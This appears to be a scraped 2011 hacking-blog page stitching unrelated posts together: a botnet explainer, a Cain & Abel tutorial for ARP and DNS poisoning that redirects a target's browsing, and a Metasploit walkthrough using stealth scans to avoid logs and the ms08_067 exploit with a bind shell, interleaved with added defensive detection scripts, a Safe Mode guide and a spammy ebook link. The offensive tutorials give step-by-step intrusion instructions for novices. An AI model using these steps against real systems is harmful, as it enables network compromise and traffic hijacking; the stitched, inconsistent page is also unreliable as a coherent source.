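10.0.0.9 - - [09/Oct/2011:15:10:40 +0000] "POST /admin/view/javascript/fckeditor/editor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1" 200 210
10.0.0.9 - - [09/Oct/2011:15:11:02 +0000] "GET /xd.html HTTP/1.1" 200 140
192.0.2.7 - - [09/Oct/2011:16:00:00 +0000] "GET /index.php?route=common/home HTTP/1.1" 200 8800
"""


def parse(line):
    """One combined-format line -> dict of fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(lines):
    """Return findings as (client_ip, tag, path).

    WEBDAV_SCRIPT_PUT  - a PUT created a file with a server-side script extension
    WEBDAV_SCRIPT_EXEC - the same client then fetched that file successfully
    FCK_PROBE          - the connector test page was requested
    FCK_UPLOAD         - a FileUpload command to the connector returned 200
    """
    findings = []
    put_scripts = defaultdict(set)   # client -> script paths it created via PUT
    for raw in lines:
        e = parse(raw)
        if not e:
            continue
        ip, method, path, status = e["ip"], e["method"], e["path"], int(e["status"])
        bare = path.split("?", 1)[0]   # strip the query string for path matching
        if method == "PUT" and SCRIPT_EXT.search(bare) and status in (200, 201, 204):
            put_scripts[ip].add(bare)
            findings.append((ip, "WEBDAV_SCRIPT_PUT", bare))
        elif method == "GET" and bare in put_scripts[ip] and status == 200:
            findings.append((ip, "WEBDAV_SCRIPT_EXEC", path))
        if FCK_CONNECTOR.search(bare):
            if method == "POST" and "Command=FileUpload" in path and status == 200:
                findings.append((ip, "FCK_UPLOAD", path))
            elif bare.lower().endswith("test.html"):
                findings.append((ip, "FCK_PROBE", bare))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG.splitlines()):
        print(*finding)
```

The PUT-then-GET pairing is the useful signal: a 201 on a PUT is normal for a legitimate WebDAV share, but a script extension being written and then executed from the same client is not. On the hardening side the same two findings map to two fixes: never serve WebDAV-writable directories with a script handler enabled, and remove the FCKeditor filemanager connectors (or the whole editor) from the admin tree.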

Saturday, 8 October 2011

.::Introduction to Bots and Botnets::.



The word bot is an abbreviation of the word robot. Robots (automated programs, not robots like Marvin the Paranoid Android) are frequently used in the Internet world. Spiders used by search engines to map websites and software responding to requests on IRC (such as eggdrop) are robots. Programs which respond autonomously to particular external events are robots, too. This article will describe a special kind of robot, or bot (as we will call them from now on): an IRC bot. It uses IRC networks as a communication channel in order to receive commands from a remote user. In this particular case the user is an attacker and the bot is a trojan horse. A good programmer can easily create his own bot, or customize an existing one. This helps hide the bot from basic security systems, and lets it spread easily.

IRC

IRC stands for Internet Relay Chat. It is a protocol designed for real-time chat communication, based on a client-server architecture. Most IRC servers allow free access for everyone. IRC is an open network protocol based on TCP (Transmission Control Protocol), sometimes enhanced with SSL (Secure Sockets Layer).

An IRC server connects to other IRC servers within the same network. IRC users can communicate both in public (on so-called channels) and in private (one to one). There are two basic levels of access to IRC channels: users and operators. A user who creates a channel becomes its operator. An operator has more privileges (dependent on modes set by the initial operator) than a regular user.

IRC bots are treated no different than regular users (or operators). They are daemon processes, which can run a number of automated operations. Control over these bots is usually based on sending commands to a channel set-up by the attacker, infested with bots. Of course, bot administration requires authentication and authorisation, so that only the owner can use them.

An important feature of such bots is the fact that they are able to spread rapidly to other computers. Careful planning of the infection process helps achieve better results in shorter time (more compromised hosts). A number of n bots connected to a single channel and waiting for commands is called a botnet.

In the recent past, zombie (another name for bot-infected computers) networks were controlled with the use of proprietary tools, developed intentionally by crackers themselves. Experience has led to experiments with new remote control methods. IRC is considered the best way to launch attacks, because it is flexible, easy to use and, above all, because public servers can be used as a communication medium (see Inset IRC). IRC offers a simple method to control hundreds or even thousands of bots at once in a flexible manner. It also allows attackers to cover their identity with the use of simple tricks such as anonymous proxies or simple IP address spoofing. Thanks to this, server administrators have little chance of finding the origin of an attack controlled in such a manner.

In most cases bots infect single user PCs, university servers or small company networks. This is because such machines are not strictly monitored, and often left totally unprotected. The reason for this is partially the lack of a real security policy, but mostly the fact that most PC users with an ADSL connection are completely unaware of the risks involved, and do not use protective software such as antivirus tools or personal firewalls.

.::Bots and their Applications::.

The possible uses for compromised hosts depend only on the imagination and skills of an attacker. Let's look at the most common ones.

DDoS

Botnets are frequently used for Distributed Denial of Service attacks. An attacker can control a large number of compromised hosts from a remote workstation, exploiting their bandwidth and sending connection requests to the target host. Many networks suffered from such attacks, and in some cases the culprits were found amongst competition (as in the case of dotcom wars).

Distributed DoS Attacks (DDoS)

A DDoS attack is a variation of a flooding DoS attack; its aim is to saturate a target network, using all the available bandwidth. Given that an attacker would need huge total bandwidth in order to saturate the targeted site, it is clear that the best way to launch this type of attack is to have many different hosts under control. Each host contributes its own bandwidth (e.g. PC ADSL users), and they are all used at once, thus distributing the attack on the target site. One of the most popular attacks performed with the use of the TCP protocol (a connection-oriented protocol) is called TCP SYN flooding. It works by sending a large number of TCP connection requests to the same web server (or to any other type of service), overloading the server's resources and leading to its saturation, preventing other users from opening their own connections. Simple and dangerously efficient! The same can be achieved with the UDP protocol (a connectionless protocol).

Attackers have spent a lot of time and effort on improving such attacks. We are now facing even better techniques, which differ from traditional DDoS attacks. They let malicious users control a very large number of zombie hosts from a remote workstation, by using, for example, the IRC protocol.

Spamming

Botnets are an ideal medium for spammers. They could be used, and are used, both for exchanging collected e-mail addresses and for controlling spam runs in the same way DDoS attacks are performed. A single spam message can be sent to the botnet and then distributed across the bots, which send the spam. The spammer stays anonymous and all the blame goes to the infected computers.

Sniffing & Keylogging

Bots can also be effectively used to enhance the ancient art of sniffing. Observing traffic data can lead to detection of an incredible amount of information. This includes user habits, TCP packet payload which could contain interesting information (such as passwords). The same applies to keylogging – capturing all the information typed in by the user (e–mails, passwords, home banking data, PayPal account info etc.).

Identity Theft

The abovementioned methods allow an attacker controlling a botnet to collect an incredible amount of personal information. Such data can then be used to build fake identities, which can in turn be used to obtain access to personal accounts or perform various operations (including other attacks) putting the blame on someone else.

Hosting of Illegal Software

Last, but not least, bot–compromised computers can be used as a dynamic repository of illegal material (pirated software, pornography, etc.). The data is stored on the disk of an unaware ADSL user.

Hours could be spent talking about the possible applications of botnets (for example pay per click abuse, phishing, hijacking HTTP/HTTPS connections etc.). Bots alone are only tools, which can easily be adapted to every task which requires a great number of hosts under single control.

.::Different Types of Bots::.

Many types of ready–made bots are available for download from the Internet. Each of them has its own special features. Let's have a look at the most popular bots, outlining common features and distinctive elements.

GT–Bot

All the GT (Global Threat) bots are based on a popular IRC client for Windows called mIRC. The core of these bots is made up of a set of mIRC scripts, which are used to control the activity of the remote system. This type of bot launches an instance of the client enhanced with control scripts and uses a second application, usually HideWindow, to make mIRC invisible to the user of the host computer. An additional DLL file adds new features to mIRC in order for scripts to be able to influence various aspects of the controlled host.

Agobot

Agobot is probably one of the most popular bots used by crackers. It is written in C++ and released on a GPL licence. What is interesting about Agobot is its source code. Highly modular, it makes it simple to add new functions. Agobot provides many mechanisms to hide its presence on the host computer. They include: NTFS Alternate Data Stream, Antivirus Killer and the Polymorphic Encryptor Engine. Agobot offers traffic sniffing and sorting functionality. Protocols other than IRC can also be used to control this bot.

DSNX

The Dataspy Network X bot is also written in C++ and its source code is also available on a GPL licence. Adding new functionality to this bot is very easy thanks to its simple plug–in architecture.

SDBot

SDBot is written in C and also available on a GPL licence. Unlike Agobot, its code is not very clear and the software itself comes with a limited set of features. Nevertheless, it is still very popular and available in different variants.

.::The Elements of an Attack::.



    An attacker first spreads a trojan horse, which infects various hosts. These hosts become zombies and connect to the IRC server in order to listen to further commands.
    The IRC server can either be a public machine in one of the IRC networks or a dedicated server installed by the attacker on one of the compromised hosts.
    Bots run on compromised computers, forming a botnet.


.::A Practical Example::.

The activity of the attacker can be split into four different stages:

    creation
    configuration
    infection
    control

The creation stage is largely dependent on attacker skills and requirements. A cracker can decide whether to write their own bot code or simply extend or customise an existing one. A wide range of ready–made bots are available and highly configurable. This is made even easier via a graphical interface. No wonder this is the option most often used by script kiddies.

The configuration stage involves supplying IRC server and channel information. Once installed on the compromised machine, the bot will connect to the selected host. An attacker first enters data necessary to restrict access to the bots, secures the channel and finally provides a list of authorised users (who will be able to control the bots). In this stage the bot can be further customised, for example by defining the target and attack method.

The infection stage involves using various techniques to spread the bots – both direct and indirect. Direct techniques include exploiting vulnerabilities of the operating system or services. Indirect attacks employ other software for the dirty work – they include using malformed HTML files exploiting Internet Explorer vulnerabilities, or using other malware distributed through peer–to–peer networks or through DCC (Direct Client–to–Client) file exchange on IRC. Direct attacks are usually automated with the use of worms. All worms have to do is search the subnets for vulnerable systems and inject the bot code. Each infected system then continues the infection process, allowing the attacker to save precious resources and providing plenty of time to look for other victims.

The mechanisms used to distribute bots are one of the main reasons for so–called Internet background noise. The main ports involved are the ones used by Windows, in particular Windows 2000 and XP SP1 (see Table 1). They seem to be the attackers' favourite target, because it is easy to find unpatched Windows computers or ones without firewalls installed. It is often the case with home PC users and small businesses, which overlook security issues and have an always-on broadband Internet connection.

The control stage involves actions after the bot is installed on the target host in a selected directory. In order to start with Windows, it updates the Windows registry keys, usually HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\. The first thing the bot does after it is successfully installed is connecting to an IRC server and joining the control channel with the use of a password. The nickname on IRC is randomly generated. The bot is then ready to accept commands from the master application. The attacker must also use a password to connect to the botnet. This is necessary, so that nobody else can use the supplied botnet.



IRC not only provides the means to control hundreds of bots, but also allows the attacker to use various techniques in order to hide his real identity. This makes it difficult to respond to attacks. Fortunately botnets, by their nature, generate suspicious traffic, which is easily detectable due to known patterns. This helps IRC administrators in detection and intervention, allowing them to take the botnet down and report the abuse.

Attackers are forced to refine their C&C (Control and Command) techniques, which leads to botnet hardening. The bots are therefore often configured to connect to different servers using a dynamically mapped hostname. This way an attacker can easily move the bots to new servers, keeping them under control even after detection. Dynamic DNS services such as dyndns.com or no–ip.com are used for this task.
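One of the known patterns mentioned above is the join burst of the control stage: many freshly infected hosts, each with a generated nickname, join the same password-protected channel within seconds of each other. The following Python is an added example, not part of the article, that looks for that pattern in an IRC server log. The log line format, the sample lines and the thresholds are all constructed for the example; a real ircd writes a different format, so LINE_RE has to be adapted.

```python
"""Added example, not part of the article: flag botnet-style joins in an
IRC server log. The log line format below is constructed for the example;
real ircd logs differ, so adapt LINE_RE to your server."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: six hosts with random-looking nicks join one keyed
# channel within seconds (the pattern the article describes), plus
# ordinary users joining #linux at a human pace for contrast.
SAMPLE_LOG = """\
2011-10-19T10:00:01 JOIN xk3jq9z1 xk3jq9z1@203.0.113.10 #ctrl key=s3cret
2011-10-19T10:00:02 JOIN pq7mz4lw pq7mz4lw@203.0.113.11 #ctrl key=s3cret
2011-10-19T10:00:02 JOIN zz91lkq0 zz91lkq0@198.51.100.5 #ctrl key=s3cret
2011-10-19T10:00:03 JOIN a8b2c9d4 a8b2c9d4@198.51.100.6 #ctrl key=s3cret
2011-10-19T10:00:04 JOIN m4n7p1q3 m4n7p1q3@192.0.2.8 #ctrl key=s3cret
2011-10-19T10:00:05 JOIN q9w8e7r6 q9w8e7r6@192.0.2.9 #ctrl key=s3cret
2011-10-19T10:00:20 JOIN alice alice@192.0.2.50 #linux
2011-10-19T10:00:45 JOIN bob bob@192.0.2.51 #linux
2011-10-19T10:03:00 JOIN carol carol@192.0.2.52 #linux
"""

# Assumed line layout: <iso timestamp> JOIN <nick> <user@host> <#channel> [key=<k>]
LINE_RE = re.compile(
    r"^(?P<ts>\S+) JOIN (?P<nick>\S+) (?P<userhost>\S+) (?P<chan>#\S+)"
    r"(?: key=(?P<key>\S+))?$"
)


def looks_random(nick: str) -> bool:
    """Heuristic: short alphanumeric nick with several digits, as generated nicks tend to be."""
    return (re.fullmatch(r"[a-z0-9]{6,12}", nick) is not None
            and sum(ch.isdigit() for ch in nick) >= 2)


def parse_joins(log_text):
    """Group JOIN events per channel as (time, nick, joined_with_key)."""
    joins = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.fromisoformat(m["ts"])
        joins[m["chan"]].append((ts, m["nick"], m["key"] is not None))
    return joins


def find_suspicious_channels(log_text, window_seconds=10, min_joins=5, min_random_ratio=0.8):
    """Return channels whose busiest join window holds at least min_joins joins,
    most of them from random-looking nicks."""
    flagged = {}
    for chan, events in parse_joins(log_text).items():
        events.sort()
        best_count, best_window = 0, []
        j = 0
        for i in range(len(events)):
            if j < i:
                j = i
            # extend j to cover every join within window_seconds of events[i]
            while j < len(events) and (events[j][0] - events[i][0]).total_seconds() <= window_seconds:
                j += 1
            if j - i > best_count:
                best_count, best_window = j - i, events[i:j]
        if best_count < min_joins:
            continue
        random_count = sum(1 for _, nick, _ in best_window if looks_random(nick))
        if random_count / best_count >= min_random_ratio:
            flagged[chan] = {
                "joins_in_window": best_count,
                "random_nicks": random_count,
                "keyed": any(ev[2] for ev in best_window),
            }
    return flagged


if __name__ == "__main__":
    for chan, info in find_suspicious_channels(SAMPLE_LOG).items():
        print(chan, info)
```

On the constructed sample only #ctrl is reported: six joins inside ten seconds, all from random-looking nicks, all using a channel key. The three human joins to #linux are spread over minutes and never reach the threshold. The thresholds are a starting point; an operator tunes them against the server's normal join rate.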

Friday, 7 October 2011

DNS poisoning using Cain


Hey guys :) this tutorial is about DNS poisoning on your network using Cain & Abel.

Download Cain here http://www.oxid.it/cain.html

This Tutorial Will be limited to just redirecting the traffic to another website.



Note: This Tutorial is for educational purposes only (you’ll be responsible for your own actions)



First What is the DNS ? (wikipedia.org)

The Domain Name System (DNS) is a hierarchical naming system for
computers, services, or any resource connected to the internet or a
private network. It associates various information with domain names
assigned to each of the participants. Most importantly, it translates
domain names meaningful to humans into the numerical (binary)
identifiers associated with networking equipment for the purpose of
locating and addressing these devices worldwide. An often used analogy
to explain the Domain Name System is that it serves as the "phone book"
for the Internet by translating human-friendly computer hostnames into
IP addresses. For example, http://www.example.com translates to 208.77.188.166.



What does poisoning the DNS allow us to do ?

It allows us to redirect the traffic to another website.



First This is the structure of the network :


Board Image

1 , 2 and 3 are computers



1 is the computer being the gateway (could be a router) (172.128.254.1)



2 is the target computer (172.128.254.10)



3 is the attacker using cain



Note : IPs are just used for this tutorial and chosen randomly.



Our work is on computer number 3.

__________________________________________________



1-After you install cain , open it and go to the sniffer tab



2-Click on configure and choose your adapter
Board Image

3-Enable the sniffer (click on the second icon in the toolbar next to the open icon)



4-Right click in the empty area and choose scan MAC addresses. We get the results above.



5-Click on the APR Tab

Board Image

6-Click on the + sign in the toolbar to add a new ARP poison routing

Board Image

7-choose the gateway which is 172.128.254.1 , in the next list you’ll
get the IP of the computer 2 which is 172.128.254.10 and click ok

Board Image

8-now click on the APR-DNS tab

Board Image



9-click on the + sign



10-enter the web address that you want to spoof , (in this case when the
user goes to facebook he’ll be redirected to myspace) click on resolve
type the web address that you want to redirect the user to it, and click
ok, and you’ll get the IP of the web address, then click ok

Board Image

you'll get something like this:

Board Image

11-now to make this work we have to enable APR poisoning , click on the
icon next to the sniffer icon, and everything should work as we expect.



Now the computer 2 will get the routes poisoned and when the user requests http://www.facebook.com he will be redirected to http://www.myspace.com .

Imagine what you can do with this technique.



I hope this was a good tutorial for you guys , and please leave your feedback.
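The redirect above only works because step 7 makes both the gateway and computer 2 believe that the attacker's MAC address belongs to the other; the APR-DNS rewrite in step 10 rides on that. That is also what gives it away on the wire: one MAC suddenly answering ARP for several IPs, and the gateway's IP changing MAC. The Python below is an added example, not part of the tutorial or of Cain, that applies those two checks to a constructed list of observed ARP replies. The IPs are the tutorial's, the MAC addresses and timings are made up.

```python
"""Added example, not part of the tutorial: detect ARP poisoning of the kind
Cain's APR performs, from a constructed list of ARP replies seen on the
segment. MAC addresses are made up; the IPs are the tutorial's."""
from collections import defaultdict

GATEWAY_IP = "172.128.254.1"

# Constructed observations: (seconds, sender_ip, sender_mac) taken from ARP
# replies. From t=30 the attacker's MAC (...:03) claims both the gateway and
# the target, which is how APR places itself between the two.
OBSERVED_ARP = [
    (0,  "172.128.254.1",  "00:11:22:33:44:01"),   # real gateway
    (1,  "172.128.254.10", "00:11:22:33:44:02"),   # real target (computer 2)
    (2,  "172.128.254.20", "00:11:22:33:44:03"),   # attacker's own address (computer 3)
    (30, "172.128.254.1",  "00:11:22:33:44:03"),   # attacker answers for the gateway
    (30, "172.128.254.10", "00:11:22:33:44:03"),   # attacker answers for the target
    (31, "172.128.254.1",  "00:11:22:33:44:03"),
]


def detect_arp_poisoning(observations, gateway_ip=GATEWAY_IP):
    """Return a list of alerts: IPs whose MAC changed after first sight, and
    MACs that claim the gateway IP together with other IPs."""
    ip_to_macs = defaultdict(set)
    mac_to_ips = defaultdict(set)
    first_mac = {}              # ip -> MAC seen first (assumed legitimate baseline)
    for _, ip, mac in sorted(observations):
        ip_to_macs[ip].add(mac)
        mac_to_ips[mac].add(ip)
        first_mac.setdefault(ip, mac)

    alerts = []
    for ip, macs in sorted(ip_to_macs.items()):
        if len(macs) > 1:
            alerts.append({
                "type": "ip_mac_changed",
                "ip": ip,
                "baseline": first_mac[ip],
                "others": sorted(macs - {first_mac[ip]}),
            })
    for mac, ips in sorted(mac_to_ips.items()):
        if len(ips) > 1 and gateway_ip in ips:
            alerts.append({
                "type": "mac_claims_gateway_and_hosts",
                "mac": mac,
                "ips": sorted(ips),
            })
    return alerts


def gateway_is_spoofed(alerts, gateway_ip=GATEWAY_IP):
    """True if any alert shows the gateway IP answered by a second MAC."""
    return any(a["type"] == "ip_mac_changed" and a["ip"] == gateway_ip for a in alerts)


if __name__ == "__main__":
    found = detect_arp_poisoning(OBSERVED_ARP)
    for a in found:
        print(a)
    print("gateway spoofed:", gateway_is_spoofed(found))
```

Against the constructed data the script raises three alerts: the gateway and computer 2 each change MAC, and MAC ...:03 is seen answering for three IPs including the gateway. A static ARP entry for the gateway on important hosts, or a switch with dynamic ARP inspection, removes the condition the tutorial relies on; the script is the cheap way to notice it after the fact from a sniffer or arpwatch-style feed.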
      

-----------------------

Using metasploit and its exploits

Welcome again to another ultra noob edition production. :) I know everyone likes colors but I am indeed just going to be very straightforward since I'm in happy land right now.

NOTE: I am not responsible for anything you do with this information. It is for educational purposes only.


First off we are going to set up metasploit with postgresql. (which I use... but you can also use sqlite3 or mysql) These Structured Query Language (SQL) databases are going to be what hold the information of a target after scans and such.


For those of you using windows, you can go here.


Click Me!


For this instalment of ultra noob edition i will be using blackbuntu. You can download blackbuntu
here!

To download backtrack you can go
here!

So once you have postgresql and its daemon running you need to run the following commands to create a user and password for your metasploit database.


In blackbuntu and backtrack 5 you will use the commands

Code:
service postgresql start
In backtrack 4r2 and below use:
Code:
/etc/init.d/postgresql-8.3 start
Note: you might have postgresql-8.4 as i do... so replace the 3 with a 4.
Code:
sudo su postgres -c psql
  ALTER USER postgres WITH PASSWORD 'your password';

  \q

  sudo passwd -d postgres
  sudo su postgres -c passwd
Note: if using backtrack ignore the sudo commands as you are already root.

What this does is set up a user postgres with whatever password you choose.


Once inside metasploit, you need to use the following command to create or connect to the postgresql database.


Code:
db_connect postgres:yourpassword@127.0.0.1/msf3

[Image: metasploit1.png]

This will create a postgresql database called msf3 if you haven't already. If you have it will just connect to it. (As shown in mine)

This is where the show really gets going.
Now you have two options... you can scan your network using outside tools to find the ip addresses or use an nmap ping scan.

To use a ping scan with nmap you would use nmap from the db_nmap command because it automatically adds hosts in the network to your new postgresql database.


Code:
db_nmap -Pn -v 192.168.1.1-255

[Image: metasploit2.png]

Now the -Pn argument tells nmap to run a ping scan on port 80 to decide what hosts are up and will add them to your database, while the -v command tells nmap to run in verbose mode giving you more detailed feedback while the scan is running.

Now after you have a list of live hosts you can run nmap in a new mode.

Code:
db_nmap -sS -sV -sU -n -O -v 192.168.1.4

[Image: metasploit3.png]

NOTE: VERY IMPORTANT. RUNNING THE -sS COMMAND VS THE -sT COMMAND.

THE -sT COMMAND COMPLETES A FULL TCP CONNECTION WHICH GETS LOGGED BY THE REMOTE HOST. TO PREVENT THIS RUNNING A STEALTH SYN SCAN WITH THE -sS COMMAND IS THE BEST OPTION. I HAVE STATED THIS IN OTHER TUTS ABOUT NMAP BUT TO STAY ANON YOU NEED TO DO THIS.

Now i run the ip 192.168.1.4 because that is what is currently on my network.

The -sS command runs a stealth syn scan which does not create a full tcp connection and allows you to continue unlogged. The -sV scan will tell you what services are running on a certain port which will come into play when selecting an exploit to use.
The -sU command runs a udp port scan against the target, and since there is no reply from udp packets they never get logged in the first place. The -O scan runs an OS scan against the target using tcp fingerprinting to tell you the operating system of the target machine, this will also come to play when selecting an exploit. The -n command tells nmap to not run a -Pn or ping scan against the target as they get logged, and since you have already done that once you wouldn't want to do it again.
And again the -v command runs nmap in verbose mode which allows you to see more of whats going on in the behind the scenes and helps you better understand what is happening.
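The scan is described above as going unlogged because no TCP session is completed. What a half-open scan avoids is the application log on the target; a packet-filtering firewall with logging enabled, or an IDS in front of the host, still records every SYN, so the scan appears as one source touching many ports on one host within a short time. The Python below is an added example, not code from the tutorial or from Metasploit, that finds that pattern in firewall log lines. The log format is constructed to resemble iptables LOG output, and the regex is an assumption to adapt to whatever your firewall writes.

```python
"""Added example, not part of the tutorial: spot a SYN port scan in firewall
logs. The log format below is constructed to resemble iptables LOG output;
adapt LINE_RE to your firewall. A half-open scan never completes the
handshake, but each SYN still reaches the packet filter's log."""
import re
from collections import defaultdict

# Constructed sample: one source sends bare SYNs to ten ports of one host in
# four seconds (a scan); a second source opens a single real SMB session.
SAMPLE_FW_LOG = """\
Oct 19 10:00:01 fw kernel: IN=eth0 SRC=192.168.1.3 DST=192.168.1.4 PROTO=TCP SPT=51000 DPT=21 SYN
Oct 19 10:00:01 fw kernel: IN=eth0 SRC=192.168.1.3 DST=192.168.1.4 PROTO=TCP SPT=51001 DPT=22 SYN
Oct 19 10:00:01 fw kernel: IN=eth0 SRC=192.168.1.3 DST=192.168.1.4 PROTO=TCP SPT=51002 DPT=23 SYN
Oct 19 10:00:02 fw kernel: IN=eth0 SRC=192.168.1.3 DST=192.168.1.4 PROTO=TCP SPT=51003 DPT=25 SYN
Oct 19 10:00:02 fw kernel: IN=eth0 SRC=192.168.1.3 DST=192.168.1.4 PROTO=TCP SPT=51004 DPT=80 SYN
Oct 19 10:00:02 fw kernel: IN=eth0 SRC=192.168.1.3 DST=192.168.1.4 PROTO=TCP SPT=51005 DPT=135 SYN
Oct 19 10:00:03 fw kernel: IN=eth0 SRC=192.168.1.3 DST=192.168.1.4 PROTO=TCP SPT=51006 DPT=139 SYN
Oct 19 10:00:03 fw kernel: IN=eth0 SRC=192.168.1.3 DST=192.168.1.4 PROTO=TCP SPT=51007 DPT=443 SYN
Oct 19 10:00:03 fw kernel: IN=eth0 SRC=192.168.1.3 DST=192.168.1.4 PROTO=TCP SPT=51008 DPT=445 SYN
Oct 19 10:00:04 fw kernel: IN=eth0 SRC=192.168.1.3 DST=192.168.1.4 PROTO=TCP SPT=51009 DPT=3389 SYN
Oct 19 10:00:40 fw kernel: IN=eth0 SRC=192.168.1.50 DST=192.168.1.4 PROTO=TCP SPT=60000 DPT=445 SYN
Oct 19 10:00:41 fw kernel: IN=eth0 SRC=192.168.1.50 DST=192.168.1.4 PROTO=TCP SPT=60000 DPT=445 ACK
"""

# Assumed layout: syslog timestamp, host, "kernel:", then iptables-style key=value
# fields ending with the TCP flag names.
LINE_RE = re.compile(
    r"^\w{3} +\d+ (?P<h>\d\d):(?P<m>\d\d):(?P<s>\d\d) \S+ kernel: .*?"
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=TCP SPT=\d+ DPT=(?P<dpt>\d+) (?P<flags>[A-Z ]+)$"
)


def parse_tcp_events(log_text):
    """Yield (seconds_of_day, src, dst, dport, flagset) for each TCP log line.
    Assumes all lines fall on one day, so time of day is enough for ordering."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        t = int(m["h"]) * 3600 + int(m["m"]) * 60 + int(m["s"])
        events.append((t, m["src"], m["dst"], int(m["dpt"]), set(m["flags"].split())))
    return events


def find_syn_scans(log_text, window_seconds=60, min_ports=8):
    """Return {(src, dst): info} for sources that sent bare SYNs to at least
    min_ports distinct ports of one host inside window_seconds."""
    syns = defaultdict(list)
    for t, src, dst, dpt, flags in parse_tcp_events(log_text):
        if flags == {"SYN"}:            # bare SYN; SYN ACK / ACK belong to real sessions
            syns[(src, dst)].append((t, dpt))

    alerts = {}
    for key, items in syns.items():
        items.sort()
        j = 0
        for i in range(len(items)):
            if j < i:
                j = i
            while j < len(items) and items[j][0] - items[i][0] <= window_seconds:
                j += 1
            ports = {p for _, p in items[i:j]}
            if len(ports) >= min_ports and len(ports) > alerts.get(key, {}).get("distinct_ports", 0):
                alerts[key] = {"distinct_ports": len(ports), "first": items[i][0], "ports": sorted(ports)}
    return alerts


if __name__ == "__main__":
    for (src, dst), info in find_syn_scans(SAMPLE_FW_LOG).items():
        print(f"{src} -> {dst}: {info['distinct_ports']} ports, e.g. {info['ports'][:5]}")
```

On the constructed log only 192.168.1.3 is reported, with ten distinct ports in a single window; the client at 192.168.1.50 sends one SYN followed by an ACK on the same port, which is what a completed handshake looks like and is ignored. The same per-source, per-window counting is what IDS portscan preprocessors do, so the -sS scan is not invisible to anyone watching the network path rather than the target's service logs.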

Now once you have a list of open ports you can begin to choose your exploit based on port and operating system. For this exercise I chose the windows/smb/ms08_067_netapi exploit.


Now since port 445 is open I will attempt to run the ms08_067_netapi exploit against the target. So with metasploit open we will run


Code:
use windows/smb/ms08_067_netapi
set payload windows/bind_tcp
set rhost 192.168.1.4
set lhost 192.168.1.3
set lport 5150
check
NOTE:Run the show options command to display what information is required for the exploit to work properly.

[Image: metasploit4.png]


Now these commands in metasploit will first set the exploit to use as the windows/smb/ms08_067_netapi exploit.

The second sets metasploit to use a bind shell using the tcp protocol.



The third sets the remote host to our target ip. The fourth sets the localhost to our ip, and the local port the one we want to listen on.

Running the check command will tell us if the target is vulnerable or not.

And as you can see it is. So now we will run the exploit command


Code:
exploit

[Image: metasploit5.png]

From there meterpreter will open. You can go here for all the meterpreter commands.




Now you're in.... All you need to do is to do whatever you want. LOL

This Has been another ultra noob edition tutorial.

References


http://www.backtrack-linux.org/forums/ba...resql.html


http://hackforums.net/showthread.php?tid=970352


If I missed a ref or something let me know. I will fix it immediately.


P.S. Will be adding things and command explanations as necessary, just P.M. me for any help or explanations.


Also would very much appreciate feedback on what I could improve within the tut and whether or not it was enjoyed/helpful.





P.S.S. Am still making the cracking WPA with aircrack tutorial.... pretty much was just too lazy to do it recently as I am going to be a father... :)



Really? No feedback or anything about this post? That's disappointing.. if I can't get more than a single thank you I might as well stop making tuts

How to Get to Safe Mode in Windows XP/Vista/7



There are times when it is better to run Windows in what is known as “Safe Mode,” which is a diagnostic setup. Its purpose is to help troubleshoot computer problems by operating with a bare minimum of drivers and Windows components.

Open Safe Mode with the F8 key

All Windows versions can be booted into Safe Mode by this method. Note that it is somewhat tricky to time this procedure and it may take several attempts.

1. Turn on or restart your computer.
2. Hold down the F8 key before the Windows logo appears. If the computer makes a complaining noise, tap the F8 key repeatedly instead of holding it down.
3. If a Windows logo or “Windows starting” appears, wait until Windows loads. Then restart the computer and try pressing F8 again.
4. Once you are successful, a menu will appear with a number of boot options. Use an arrow key to navigate to “Safe Mode” and press the Enter key.

Trying to get to Safe Mode by using the F8 key can be frustrating and there is another way that uses the System Configuration Utility (msconfig).

System Configuration Utility in Windows XP

1. Open the Start menu and click “Run.”
2. In the Run box, enter “msconfig” (without quotes).
3. Click “OK.”
4. Select the tab “BOOT.INI.”
5. Put a check by the entry /SAFEBOOT. Also click the radio button MINIMAL.
6. Click “Apply” and “OK.”
7. Restart the computer. The system should open in Safe Mode.

When finished using Safe Mode, open msconfig again and remove the check by /SAFEBOOT. Otherwise, you will continue to open in Safe Mode whenever you boot.

System Configuration Utility in Windows 7/Vista

1. Open the Start menu.
2. Enter “msconfig” (without quotes) in the box labeled Start search (Vista) or Search programs and files (Windows 7).
3. Click the entry “msconfig” or “msconfig.exe” shown in the programs list.
4. Select the “Boot” tab.
5. In the “Boot options” section, check “Safe boot.” Also, make sure the radio button “Minimal” is selected.
6. Click “OK.”
7. Restart the computer.

When you are finished with Safe Mode, go back to msconfig and remove the check by “Safe boot” that was applied in step 5 above.




This tips section is maintained by Vic Laurie. Vic runs a Windows blog called The PC Informant and also operates a computer education website.


Learn Full Metasploit (Free Ebook By Ownedsec)



First step to Last step
$485 for free

'HACK THE PLANET'
here is the link
http://adf.ly/35XQT

NO SHARE CASH LINKS


 